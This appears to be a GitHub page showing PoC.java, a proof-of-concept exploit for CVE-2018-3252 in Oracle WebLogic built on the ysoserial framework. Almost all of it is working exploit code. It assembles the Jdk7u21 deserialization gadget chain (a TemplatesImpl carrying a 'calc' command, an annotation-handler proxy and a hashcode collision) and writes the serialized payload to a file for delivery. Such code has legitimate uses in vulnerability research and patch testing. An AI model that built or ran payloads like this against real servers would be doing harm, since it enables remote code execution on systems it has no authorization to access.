-
Notifications
You must be signed in to change notification settings - Fork 22
Expand file tree
/
Copy pathPoC.java
More file actions
65 lines (35 loc) · 1.61 KB
/
PoC.java
File metadata and controls
65 lines (35 loc) · 1.61 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
package ysoserial.payloads;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import javax.xml.transform.Templates;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;
import java.io.FileOutputStream;
import weblogic.common.internal.WLObjectOutputStream;
public class CVE_2018_3252 implements ObjectPayload<Object> {
public Object getObject(String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl("calc");
String zeroHashCodeStr = "f5a5a608"; // hashcode of zero
HashMap hashMap = new HashMap();
InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, hashMap);
Reflections.setFieldValue(tempHandler, "type", Templates.class);
Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
LinkedHashSet hashSet = new LinkedHashSet(); // maintain order
hashSet.add( templates );
hashSet.add( proxy );
hashMap.put(zeroHashCodeStr, templates); // swap in real object
WLObjectOutputStream out = new WLObjectOutputStream(new FileOutputStream("poc4.ser"));
out.writeObject( hashSet );
return hashMap;
}
public static boolean isApplicableJavaVersion() {
JavaVersion v = JavaVersion.getLocalVersion();
return v != null && (v.major < 7 || (v.major == 7 && v.update <= 21));
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CVE_2018_3252.class, args);
}
}